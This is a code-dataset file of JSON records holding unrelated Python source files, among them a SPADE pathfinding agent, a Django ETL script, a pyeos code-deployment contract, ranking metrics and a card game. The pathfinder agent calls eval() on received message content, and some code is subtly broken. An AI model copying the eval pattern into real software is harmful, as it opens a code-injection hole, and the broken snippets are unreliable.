This does not delete movie files.\n            The default value is `False`, which keeps the video list.\n        \"\"\"\n\n        # Close current video.\n        self.close_video_recorder()\n        if is_in_ipython():\n            for f in self.videos:\n                if not os.path.exists(f):\n                    continue\n\n                video = io.open(f, \"r+b\").read()\n                encoded = base64.b64encode(video)\n\n                display.display(os.path.basename(f))\n                display.display(display.HTML(data=\"\"\"\n                \n                \"\"\".format(encoded.decode('ascii'))))\n\n        if reset:\n            self.videos = []\n","repo_name":"AllanYiin/trident","sub_path":"trident/reinforcement/envs/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":22162,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"6"} +{"seq_id":"19351032994","text":"from __future__ import print_function\nimport spade\n\nfrom map.map import Map\nfrom astar.astar import Astar\nfrom util import backtrace\n\nclass PathFinder(spade.Agent.Agent):\n    \"\"\"Agent that finds best path\"\"\"\n    is_setup = False\n\n\n    class RequestInformationBehaviour(spade.Behaviour.PeriodicBehaviour):\n        astar = Astar()\n\n        @backtrace\n        def _onTick(self):\n            msg = self._receive(False)\n            while msg:\n                data = None\n                content = eval(msg.getContent())\n\n                if 'map' not in content.keys():\n                    path = self.superpath(content['location'], content['open'])\n                else:\n                    try:\n                        path = self.motherpath(content['map'], content['location'],\n                            content['open'])\n                    except:\n                        print(self.myAgent.name, \"error with\", content)\n                        raise\n\n                rep = msg.createReply()\n                if self.myAgent.sv:\n                    rep.setOntology(content['ontology'])\n                else:\n                    rep.setPerformative(\"inform\")\n                rep.setContent(\"route {}\".format(path))\n                self.myAgent.send(rep)\n                #print(self.myAgent.name, \"path done\", path)\n                msg = self._receive(False)\n\n        def motherpath(self, map, location, open):\n            if len(open) == 0:\n                open = [(1, 1)]\n            path = self.astar.getPath(map, location, open[0])\n            for goal in open:\n                tempPath = self.astar.getPath(map, location, goal)\n                if len(tempPath) > 0:\n                    if len(tempPath) < len(path):\n                        path = tempPath\n\n            if len(path) == 0:\n                path = self.astar.getPath(map, location, (1, 1))\n            return path\n\n        def superpath(self, location, open):\n            return self.motherpath(self.myAgent.map, location, open)\n\n\n    class DatabaseMapUpdates(spade.Behaviour.PeriodicBehaviour):\n        @backtrace\n        def _onTick(self):\n            msg = self._receive(False)\n            if msg:\n                content = msg.getContent().split(' ', 1)\n                if content[0] == \"map\":\n                    self.myAgent.map = content[1]\n                    self.myAgent.sendMapUpdateRequest()\n\n\n    class RegisterServicesBehav(spade.Behaviour.OneShotBehaviour):\n        def _process(self):\n            dad = spade.DF.DfAgentDescription()\n            sd = spade.DF.ServiceDescription()\n            sd.setType(\"pathfinder\")\n            sd.setName(\"standalone\")\n            dad.addService(sd)\n\n            dad.setAID(self.myAgent.getAID())\n            res = self.myAgent.registerService(dad)\n            print(self.myAgent.name, \"services registered:\", res)\n\n\n    class SupervisorDetection(spade.Behaviour.PeriodicBehaviour):\n        def onStart(self):\n            print(self.myAgent.name, \"Looking for supervisor\")\n            self.counter = 0\n\n        @backtrace\n        def _process(self):\n            sd = spade.DF.ServiceDescription()\n            sd.setType(\"supervisor\")\n            dad = spade.DF.DfAgentDescription()\n            dad.addService(sd)\n\n            result = self.myAgent.searchService(dad)\n            if len(result):\n                self.myAgent.sv = True\n\n            if self.counter > 50 or self.myAgent.sv:\n                self.myAgent.removeBehaviour(self)\n                if self.counter > 50:\n                    self.myAgent.removeBehaviour(self.myAgent.mapbehav)\n            self.counter = self.counter + 1\n\n\n    def _setup(self):\n        
print(\"Starting PathFinderAgent {}...\".format(self.name))\n\n self.sv = False\n self.map = []\n\n self.addBehaviour(self.RegisterServicesBehav(), None)\n\n replyTemp = spade.Behaviour.ACLTemplate()\n replyTemp.setPerformative(\"request\")\n replyTemp.setOntology(\"map\")\n temp = spade.Behaviour.MessageTemplate(replyTemp)\n\n rb = self.RequestInformationBehaviour(.1)\n self.addBehaviour(rb, temp)\n\n sb = self.SupervisorDetection(.1)\n self.addBehaviour(sb, None)\n\n dbTemp = spade.Behaviour.ACLTemplate()\n dbTemp.setPerformative(\"inform\")\n temp = spade.Behaviour.MessageTemplate(dbTemp)\n self.mapbehav = self.DatabaseMapUpdates(.1)\n self.addBehaviour(self.mapbehav, temp)\n self.sendMapUpdateRequest()\n\n self.is_setup = True\n\n def takeDown(self):\n print(\"Stopping PathFinder agent {}...\".format(self.name))\n\n def sendMapUpdateRequest(self):\n msg = spade.ACLMessage.ACLMessage()\n msg.setPerformative(msg.REQUEST)\n msg.addReceiver(spade.AID.aid(\"db@127.0.0.1\", [\"xmpp://db@127.0.0.1\"]))\n msg.setContent(\"MAP\")\n self.send(msg)\n\n\ndef main():\n import time\n import traceback\n pf = PathFinder(\"path@127.0.0.1\", \"secret\")\n pf.start()\n\n try:\n while 1: time.sleep(1)\n except KeyboardInterrupt:\n pass\n except:\n print(traceback.format_exc())\n\n pf.stop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"XeryusTC/dmas","sub_path":"agents/pathfinder.py","file_name":"pathfinder.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24287575783","text":"class ListNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def to_list(self):\n result = []\n current = self\n while current:\n result.append(current.value)\n current = current.next\n return result\n\n\ndef rotate_linked_list(head):\n if not head:\n return None\n current = head\n new_head = current.next\n n = new_head.next\n new_head.next = current\n current.next = rotate_linked_list(n)\n\n return new_head\n\n\ndef main():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n assert rotate_linked_list(head).to_list() == [2, 1, 4, 3]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ckallum/Daily-Coding-Problem","sub_path":"solutions/#145.py","file_name":"#145.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8582685925","text":"import datetime\nimport os\n\nimport django\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'spec_dc.settings'\ndjango.setup()\n\nfrom dim.models import DimSuite, DimDate, DimCpu, DimVendor, DimSystem, DimSystemSeries\nfrom dwd.models import DwdTestInfo, DwdSubmitInfo\nfrom ods.models import OdsSpecModel\n\n\nclass BuildDimDwd:\n\n def run(self):\n self._solve()\n\n def _solve(self):\n query_set = OdsSpecModel.objects.all()\n idx = 1\n total_num = len(query_set)\n for spec_model in query_set.iterator():\n self._build_dim(spec_model)\n if idx % 50 == 0:\n print(f\"Status: {idx} / {total_num}\")\n idx += 1\n\n def _build_dim(self, spec_model: OdsSpecModel):\n suite = self._process_suite(spec_model.suite)\n test_date = self._process_date(spec_model.test_date)\n hw_avail = self._process_date(spec_model.hw_avail)\n cpu = self._process_cpu(\n spec_model.cpu_vendor, spec_model.cpu_name, spec_model.cpu_ghz,\n spec_model.max_ghz, spec_model.cores_per_chip, spec_model.threads_per_core,\n )\n vendor = 
self._process_vendor(spec_model.hw_vendor)\n        system_series = self._process_system_series(spec_model.system_series)\n        system_name = f\"{spec_model.system_series} ({spec_model.cpu_name})\"\n\n        system = self._process_system(\n            vendor.id, spec_model.hw_vendor, system_series, system_name,\n            cpu, spec_model.chips, spec_model.nodes, spec_model.total_cores,\n            spec_model.l1_cache, spec_model.l2_cache, spec_model.l3_cache,\n            spec_model.memory, spec_model.memory_number, spec_model.memory_amount,\n            spec_model.storage_type, spec_model.storage, spec_model.os,\n            spec_model.file_system, spec_model.jvm, hw_avail.id\n        )\n\n        DwdTestInfo.objects.get_or_create(\n            vendor_id=vendor.id, vendor_name=vendor.vendor, system_id=system.id,\n            system_name=system_name, system_series_id=system_series.id, system_series_name=system_series.system_series,\n            cpu_id=cpu.id, cpu_name=cpu.cpu_name, chips=system.chips, nodes=system.nodes,\n            total_cores=system.total_cores, l1_cache=system.l1_cache,\n            l2_cache=system.l2_cache, l3_cache=system.l3_cache, memory=system.memory,\n            memory_amount=system.memory_amount, memory_number=system.memory_number,\n            storage_type=system.storage_type, storage=system.storage, os=system.os,\n            file_system=system.file_system, jvm=system.jvm, hw_avail_id=hw_avail.id,\n            result=spec_model.result, suite_id=suite.id, suite_name=suite.suite,\n            test_date_id=test_date.id, url_suffix=spec_model.url_suffix, full_url=spec_model.full_url,\n        )\n        DwdSubmitInfo.objects.get_or_create(\n            vendor_id=vendor.id, vendor_name=vendor.vendor, system_id=system.id,\n            system_name=system.system_name, system_series_id=system_series.id,\n            system_series_name=system_series.system_series,\n            suite_id=suite.id, suite_name=suite.suite, submit_year=spec_model.submit_year,\n            submit_quarter=spec_model.submit_quarter, url_suffix=spec_model.url_suffix,\n            full_url=spec_model.full_url,\n        )\n\n    @classmethod\n    def _process_system(cls, vendor_id, hw_vendor, system_series, system_name, cpu, chips,\n                        nodes, total_cores, l1_cache, l2_cache, l3_cache, memory,\n                        memory_number, memory_amount, storage_type, storage, os,\n                        file_system, jvm, hw_avail_id):\n        obj, created = DimSystem.objects.get_or_create(\n            vendor_id=vendor_id, vendor_name=hw_vendor, system_series_id=system_series.id,\n            system_series_name=system_series.system_series,\n            system_name=system_name, cpu_id=cpu.id, cpu_name=cpu.cpu_name, chips=chips, nodes=nodes,\n            total_cores=total_cores,\n            l1_cache=l1_cache, l2_cache=l2_cache, l3_cache=l3_cache, memory=memory,\n            memory_number=memory_number, memory_amount=memory_amount, storage_type=storage_type,\n            storage=storage, os=os, file_system=file_system, jvm=jvm, hw_avail_id=hw_avail_id,\n        )\n        return obj\n\n    @classmethod\n    def _process_vendor(cls, hw_vendor):\n        obj, created = DimVendor.objects.get_or_create(vendor=hw_vendor)\n        return obj\n\n    @classmethod\n    def _process_cpu(cls, cpu_vendor, cpu_name, cpu_ghz, max_ghz, cores, threads_per_core):\n        obj, created = DimCpu.objects.get_or_create(\n            cpu_vendor=cpu_vendor, cpu_name=cpu_name, cpu_ghz=cpu_ghz, max_ghz=max_ghz,\n            cores=cores, threads_per_core=threads_per_core\n        )\n        return obj\n\n    def _process_suite(self, suite):\n        category, benchmark = self._parse_suite(suite)\n        obj, created = DimSuite.objects.get_or_create(category=category, benchmark=benchmark, suite=suite)\n        return obj\n\n    def _process_date(self, date_str):\n        year, quarter, month, day = self._parse_date(date_str)\n        obj, created = DimDate.objects.get_or_create(year=year, quarter=quarter, month=month, day=day,\n                                                     full_date=date_str)\n        return obj\n\n    
@classmethod\n def _parse_suite(cls, suite):\n if 'SPECfp' in suite or 'SPECint' in suite:\n category = 'cpu'\n benchmark = 'cpu2006'\n elif '2017' in suite:\n category = 'cpu'\n benchmark = 'cpu2017'\n elif 'jbb2015' in suite:\n category = 'java'\n benchmark = 'jbb2015'\n elif 'jvm2008' in suite:\n category = 'java'\n benchmark = 'jvm2008'\n else:\n category = 'power'\n benchmark = 'ssj2008'\n return category, benchmark\n\n @classmethod\n def _parse_date(cls, date_str: datetime.date):\n year = int(date_str.strftime('%Y'))\n month = int(date_str.strftime('%m'))\n day = int(date_str.strftime('%d'))\n quarter = (month - 1) // 3 + 1\n return year, quarter, month, day\n\n @classmethod\n def _process_system_series(cls, system_series):\n obj, created = DimSystemSeries.objects.get_or_create(system_series=system_series)\n return obj\n\n\ndef main():\n build_dim_dwd = BuildDimDwd()\n build_dim_dwd.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ScottWong98/spec_dc","sub_path":"dim/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72995156668","text":"from eoslib import *\nfrom backyard.token import transfer\n\ncode = N('codestore')\n\ndef deploy(mod_name, src_code):\n print('++++++++++++deploy:mod_name', mod_name)\n id = hash64(mod_name)\n itr = db_find_i64(code, code, code, id)\n if itr < 0:\n db_store_i64(code, code, code, id, src_code)\n else:\n db_update_i64(itr, code, src_code)\n\n mod_name = mod_name.decode('utf8')\n if mod_name.endswith('.mpy'):\n __import__('codestore.'+mod_name[:-4])\n elif mod_name.endswith('.py'):\n __import__('codestore.'+mod_name[:-3])\n\ndef apply(receiver, code, action):\n if action == N('sayhello'):\n require_auth(N('codestore'))\n msg = read_action()\n print(msg.decode('utf8'))\n elif action == N('deploy'):\n require_auth(code)\n msg = read_action()\n length = int.from_bytes(msg[:1], 'little')\n mod_name = msg[1:1+length]\n src_code = msg[1+length:]\n# print('+++++++++++++++++src_code type:', src_code[0])\n# print(src_code)\n deploy(mod_name, src_code)\n elif action == N('transfer'):\n msg = read_action()\n print('transfer', msg)\n t = transfer()\n t.unpack(msg)\n t.p()\n auction = SimpleAuction()\n auction.bid(t._from, t.amount)","repo_name":"learnforpractice/pyeos","sub_path":"programs/pyeos/tests/python/codestore/codestore.py","file_name":"codestore.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"6"} +{"seq_id":"72810206907","text":"import os\n\nclass LetsCleanIt:\n @staticmethod\n def CleanAll():\n files_to_remove = [\n 'scrapped_tweets.csv',\n 'cleaned_tweets.csv',\n 'translated_tweets.csv',\n 'tweets_with_sentiment.csv',\n 'tweets_with_categories.csv',\n 'databaseOK.txt',\n 'wordcloud.png',\n 'piechart.png',\n 'time_series.png',\n 'anomalies.png',\n 'logs.log',\n 'geckodriver.log',\n ]\n \n for file in files_to_remove:\n if os.path.exists(file):\n os.remove(file)\n\nif __name__ == '__main__':\n LetsCleanIt.CleanAll()","repo_name":"NebyX1/data-science-engineering-end-to-end-project-bootcamp-milei-twitter-scraping","sub_path":"clean_all.py","file_name":"clean_all.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2140138554","text":"import os,sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilename1 = 
'/data/nefilter1.bin'\nfilename2 = '/data/nefilter2.bin'\n\n# >i4 32bit int, big endian\n# \").strip(), article2.details.description, \"description\")\r\n else:\r\n self.assertEqual(article.details.description, article2.details.description, \"description\")\r\n if article.details.manufacturerArticleId is None and article2.details.manufacturerArticleId is not None:\r\n self.assertEqual(article.productId, article2.details.manufacturerArticleId, \"manufacturerArticleId\")\r\n else:\r\n self.assertEqual(article.details.manufacturerArticleId, article2.details.manufacturerArticleId, \"manufacturerArticleId\")\r\n\r\n self.assertEqual(article.details.manufacturerName, article2.details.manufacturerName, \"manufacturerName\")\r\n\r\n if len(article.details.keywords) > 0:\r\n self.assertEqual(article.details.keywords, article2.details.keywords, \"keywords\")\r\n if len(article.details.specialTreatmentClasses) > 0 and len(article2.details.specialTreatmentClasses) > 0:\r\n self.assertEqual(article.details.specialTreatmentClasses, article2.details.specialTreatmentClasses, \"specialTreatmentClasses\")\r\n\r\n self.assertEqual(article.details.erpGroupBuyer, article2.details.erpGroupBuyer, \"erpGroupBuyer\")\r\n self.assertEqual(article.details.erpGroupSupplier, article2.details.erpGroupSupplier, \"erpGroupSupplier\")\r\n self.assertEqual(article.details.remarks, article2.details.remarks, \"remarks\")\r\n self.assertEqual(article.details.buyerId, article2.details.buyerId, \"buyerId\")\r\n self.assertEqual(article.details.segment, article2.details.segment, \"segment\")\r\n self.assertEqual(article.details.articleOrder, article2.details.articleOrder, \"articleOrder\")\r\n self.assertEqual(article.details.articleStatus, article2.details.articleStatus, \"articleStatus\")\r\n if article.details.supplierAltId is not None and article2.details.supplierAltId is not None:\r\n self.assertEqual(article.details.supplierAltId, article2.details.supplierAltId, \"supplierAltId\")\r\n\r\n self.assertEqual(article.details.manufacturerTypeDescription, article2.details.manufacturerTypeDescription, \"manufacturerTypeDescription\")\r\n\r\n self.assertEqual(article.orderDetails, article2.orderDetails, \"orderDetails\")\r\n self.assertEqual(article.priceDetails, article2.priceDetails, \"priceDetails\")\r\n self.assertEqual(article.priceDetails[0], article2.priceDetails[0], \"priceDetails[0]\")\r\n\r\n self.assertEqual(len(article.featureSets), len(article2.featureSets), \"len(featureSets)\")\r\n if len(article.featureSets) > 0:\r\n self.assertEqual(len(article.featureSets[0]), len(article2.featureSets[0]), \"len(featureSets[0])\")\r\n self.assertEqual(article.featureSets[0].referenceSystem, article2.featureSets[0].referenceSystem, \"featureSets.referenceSystem\")\r\n self.assertEqual(article.featureSets[0].features[0].name, article2.featureSets[0].features[0].name, \"feature[0].name\")\r\n self.assertEqual(article.featureSets[0].features[0], article2.featureSets[0].features[0], \"feature[0]\")\r\n\r\n self.assertEqual(article.featureSets[0], article2.featureSets[0], \"featureSet[0]\")\r\n self.assertEqual(article.featureSets, article2.featureSets, \"featureSets\")\r\n self.assertEqual(article.mimeInfo, article2.mimeInfo, \"mimeInfo\")\r\n self.assertEqual(3, len(article2.mimeInfo), \"mimeInfo\")\r\n if len(article.references) > 0 and len(article2.references) > 0 :\r\n self.assertEqual(article.references, article2.references, \"references\")\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# import sys;sys.argv = ['', 
'Test.testName']\r\n# unittest.main()\r\n","repo_name":"HenrikPilz/BMEcatConverter","sub_path":"src/test/handler/xml/xmlImportTest.py","file_name":"xmlImportTest.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"2977242339","text":"'''\n\nINFO: This file contains the ExpAnalizer class for assessing model quality\n\nDescription: Unlike the regular analysis, you can now specify an epsilon neighborhood of correct articles\nI.e. a correct article now counts not as 1, but as 1 + 2 * epsilon\n\n'''\n\n\nimport matplotlib.pyplot as plt\nimport math\nimport os\nfrom tools.inverse_index import InvIndex\nfrom tools.relative_paths_to_directories import path_to_directories\n\nPATH_TO_ROOT, PATH_TO_TOOLS, PATH_TO_FILES, PATH_TO_TF_IDF, PATH_TO_INV_IND, PATH_TO_BM_25,\\\n    PATH_TO_LEARNING_TO_RANK = path_to_directories(os.getcwd())\n\n\nclass ExpAnalizer:\n    # sample - the sample (an array of Request (request) structures from pravoved_recognizer.py)\n    # answers - the model's answers (an array whose i-th element is an array with the answers to the\n    # i-th query of the sample, sorted by relevance, given as (number in our numbering))\n    # epsilon - the Epsilon parameter (see the description)\n    def __init__(self, answers, sample, epsilon):\n        self.sample = sample\n        self.answers = answers\n        self.epsilon = epsilon\n        self.id_to_num = {}\n        invInd = InvIndex.load(PATH_TO_INV_IND)\n        self.num_to_id = {}\n        for doc_num, doc_id in enumerate(invInd.doc_ids):\n            self.id_to_num[doc_id] = doc_num\n            self.num_to_id[doc_num] = doc_id\n\n    @staticmethod\n    def save_graphics(x, metric, ylabel: str, name_file: str):\n        plt.plot(x, metric, color='red', label='Articles')\n        plt.ylabel(ylabel)\n        plt.xlabel('Number of articles in the top')\n        plt.legend()\n        plt.savefig(os.path.join(PATH_TO_FILES, 'metrics_count', f'{name_file}_exper.png'))\n        plt.show()\n\n    # n - upper bound on the number of articles in the top\n    def top_n_cover(self, n, in_percent=True):\n\n        x = []\n        y_codex = []\n        y_articles = []\n\n        for i in range(1, n, 2):\n            codex = 0\n            article = 0\n            both = 0\n            ind = 0\n            for samp in self.sample:\n                cod = 0\n                art = 0\n                answer = self.answers[ind][:i]\n                ind += 1\n                for ans in answer:\n                    if ans[0] == samp['codex']:\n                        cod = 1\n                        right_ans = (str(samp['codex']), samp['norm'])\n                        if self.id_to_num.get(right_ans, -100) - self.epsilon <= self.id_to_num[(ans)]\\\n                                <= self.id_to_num.get(right_ans, -100) + self.epsilon:\n                            art = 1\n                if cod == 1 and art == 1:\n                    both += 1\n                elif cod == 1:\n                    codex += 1\n                elif article == 1:\n                    art += 1\n\n            x.append(i)\n            y_codex.append(codex + both)\n            y_articles.append(both)\n\n        if (not in_percent):\n            plt.plot(x, y_codex, color='blue', label='Codexes')\n            plt.plot(x, y_articles, color='red', label='Articles')\n            plt.title('Coverage as a function of the number of articles in the top')\n            plt.ylabel('Hits')\n            plt.xlabel('Number of articles in the top')\n            plt.legend()\n            plt.show()\n\n        else:\n            for i in range(len(y_articles)):\n                y_articles[i] /= len(self.sample)\n                y_codex[i] /= len(self.sample)\n            plt.plot(x, y_codex, color='blue', label='Codexes')\n            plt.plot(x, y_articles, color='red', label='Articles')\n            plt.title('Coverage as a function of the number of articles in the top')\n            plt.ylabel('Hits (percent)')\n            plt.xlabel('Number of articles in the top')\n            plt.legend()\n            plt.show()\n\n\n\n    @staticmethod\n    def ap_k(relev_positions, k):\n        ans = 0\n        num_rel = 0\n        for rl in relev_positions:\n            if rl <= k:\n                num_rel += 1\n                ans += num_rel / rl\n            else:\n                break\n        return ans\n\n    def map_k(self, K):\n        apk = [0] * ((K + 1) // 
2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((ans[0], ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n apk[k // 2] += self.ap_k(relev_positions, k)\n apk = [a / len(self.sample) for a in apk]\n x = [i for i in range(1, K + 1, 2)]\n print(\"exper_map: \", apk)\n self.save_graphics(x=x, metric=apk, ylabel='MAP(k)', name_file='map')\n\n def ndcg(self, K):\n ndcg = [0] * ((K + 1) // 2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((str(ans[0]), ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n for r in relev_positions:\n if r <= k:\n ndcg[k // 2] += 1/math.log(r + 1, 2)\n break\n ndcg = [a / len(self.sample) for a in ndcg]\n print(\"exper_ndcg: \", ndcg)\n x = [i for i in range(1, K + 1, 2)]\n self.save_graphics(x=x, metric=ndcg, ylabel='NDCG(k)', name_file='ndcg')\n\n\n\n\n @staticmethod\n def mrr_k(relev_positions, k):\n for rl in relev_positions:\n if rl <= k:\n return 1 / rl\n return 0\n\n def mrr(self, K):\n mrr = [0] * ((K + 1) // 2)\n for j in range(len(self.sample)):\n right_ans = (str(self.sample[j]['codex']), self.sample[j]['norm'])\n right_ans_num = self.id_to_num.get(right_ans, -100)\n actual_art = [self.num_to_id.get(ind, (-1000, -1000)) for ind in\n range(right_ans_num - self.epsilon, right_ans_num + self.epsilon + 1)]\n predicted_art = []\n for ans in self.answers[j][:K]:\n predicted_art.append((ans[0], ans[1]))\n relev_positions = []\n for i, pa in enumerate(predicted_art):\n if pa in actual_art:\n relev_positions.append(i + 1)\n for k in range(1, K + 1, 2):\n mrr[k // 2] += self.mrr_k(relev_positions, k)\n mrr = [a / len(self.sample) for a in mrr]\n x = [i for i in range(1, K + 1, 2)]\n print(\"exper_mrr:\", mrr)\n\n self.save_graphics(x=x, metric=mrr, ylabel='MRR', name_file='mrr')\n\n","repo_name":"sh-anton8/find_norm","sub_path":"experiment_analiz.py","file_name":"experiment_analiz.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24274924598","text":"import sys, os, random\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))\n\nfrom eightcards.environment.card import Card\nfrom eightcards.environment.player import Player\n\nclass Board:\n\n def __init__(self):\n self.cards = []\n self.players = []\n self.pile = []\n self.trump = None\n self.defender = None\n self.attacker = None\n self.turns = 1\n self.__turn_end = False\n self.winner = None\n \n @property\n def turn_end(self):\n return self.__turn_end\n\n @turn_end.setter\n def turn_end(self, value):\n self.__turn_end = value\n\n\n @property\n def pile_number(self):\n return len(self.pile)\n\n def 
init_board(self):\n\n self._init_pile()\n self._init_players()\n\n for player in self.players:\n self._deal(player)\n\n self.trump = random.choice(['Heart', 'Spade', 'Club', 'Diamond'])\n\n print(\"Turn 1 -- Number of left cards: \" + str(self.pile_number))\n\n return\n\n def _init_pile(self):\n for suit in ['Heart', 'Spade', 'Club', 'Diamond']:\n for number in range(1, 14):\n self.pile.append(Card(suit, number, self))\n self.pile.extend([Card('Joker', -2, self), Card('Joker', -1, self)])\n random.shuffle(self.pile)\n return\n\n def _init_players(self, num_player=2):\n for j in range(num_player):\n self.players.append(Player(\"Player \" + str(j+1)))\n flag = random.randint(0, num_player-1)\n self.defender = self.players[flag]\n self.attacker = self.players[flag-1]\n # for player in self.players:\n # if not player.identity:\n # player.identity = 'Assist'\n return\n\n def _deal(self, player):\n\n while player.hand_number < 8 and self.pile_number > 0:\n card = self.pile.pop()\n player.hand.append(card)\n if self.pile_number == 0:\n break\n \n return\n\n def attack_action(self):\n\n if self.attacker.no_hand:\n self._end_turn('abandon')\n return\n\n\n print(\"\\n\" + self.attacker.name + \": You are now the attacker. \" + \" (Trump is \" + str(self.trump) +\") Your hand is: \\n\")\n # print(self.attacker.hand)\n print(\" \".join(str(card.show()) for card in self.attacker.hand))\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards))\n title = \"\\n Please use a card to attack (input 'abandon' to abandon attacking):\"\n while True:\n\n input_str = input(title)\n\n if input_str == 'abandon':\n self._end_turn(input_str)\n break\n \n card = self.attacker.get_card_by_str(input_str)\n\n if not card:\n \n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n elif self.attacker.attack(card):\n self.cards.append(card)\n\n if self.attacker.no_hand and self.pile_number == 0:\n self.winner = self.attacker\n self.end_game()\n\n break\n\n else:\n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n return\n \n\n def defend_action(self):\n print(\"\\n\" + self.defender.name + \": You are now the defender. \" + \" (Trump is \" + str(self.trump) + \") Your hand is: \\n\")\n print(\" \".join(str(card.show()) for card in self.defender.hand))\n # print(self.defender.hand)\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards))\n title = \"\\nPlease use a card to defend (input 'surrender' to surrender this turn):\"\n while True:\n\n input_str = input(title)\n\n if input_str == 'surrender':\n self._end_turn(input_str)\n break\n \n card = self.defender.get_card_by_str(input_str)\n\n if not card:\n \n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n\n elif self.defender.defend(card):\n self.cards.append(card)\n\n if self.defender.no_hand:\n if self.pile_number == 0:\n self.winner = self.defender\n self.end_game()\n else:\n self._end_turn()\n\n break\n\n else:\n title = \"\\nThe card you chose is not valid. Please choose another one: \"\n\n return\n\n def hunt_action(self):\n print(\"\\n\" + self.attacker.name + \": You are now the attacker. \" + \" (Trump is \" + str(self.trump) +\") Your hand is: \\n\")\n print(\" \".join(str(card.show()) for card in self.attacker.hand))\n print(\"\\nThe cards on the board are: \\n\")\n print(\" \".join(str(card.show()) for card in self.cards)) \n print(\"\\nThe defender has surrendered. 
Please choose the cards to hunt (Press 'Enter' twice to confirm): \\n\")\n        \n        input_str = input()\n        num_hunt_cards = 1\n\n        while input_str != '' and num_hunt_cards <= self.defender.hand_number:\n            card = self.attacker.get_card_by_str(input_str)\n\n            if not card: \n\n                print(\"\\nThe card you chose is not valid. Please choose another one: \\n\")\n\n            elif self.attacker.attack(card):\n                self.cards.append(card)\n\n                if self.attacker.no_hand and self.pile_number == 0:\n                    self.winner = self.attacker\n                    self.end_game()\n\n            else:\n\n                print(\"\\nThe card you chose is not valid. Please choose another one: \\n\")\n\n            input_str = input()\n            num_hunt_cards += 1\n\n        return\n\n\n    def _end_turn(self, input_str=None):\n\n        if input_str == 'surrender':\n            self.hunt_action()\n            while self.cards:\n                card = self.cards.pop()\n                self.defender.hand.append(card)\n        \n        else:\n            print(\"\\n\" + self.defender.name + \": You are now the defender. \" + \" (Trump is \" + str(self.trump) + \") Your hand is: \\n\")\n            print(\" \".join(str(card.show()) for card in self.defender.hand))\n            # print(self.defender.hand)\n            print(\"\\nThe cards on the board are: \\n\")\n            print(\" \".join(str(card.show()) for card in self.cards))\n            title = \"\\nDo you want to surrender? (y/n): \"\n            answer = input(title)\n            if answer not in ['n', 'N', 'no', 'No', 'NO']:\n                self.defender.hand.extend(self.cards)\n            else:\n                self.attacker, self.defender = self.defender, self.attacker\n\n        self.cards = []\n        self._deal(self.attacker)\n        self._deal(self.defender)\n        self.turns += 1\n        self.turn_end = True\n\n        print(\"\\nTurn \" + str(self.turns) + \" -- Number of left cards: \" + str(self.pile_number)) \n    \n\n    def is_end(self):\n        return self.winner is not None\n\n    def end_game(self):\n        print(\"\\nWINNER IS \" + self.winner.name + \"!!!\")\n        sys.exit(0)\n\n\n\n","repo_name":"hengjiwang/eightcards","sub_path":"eightcards/environment/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
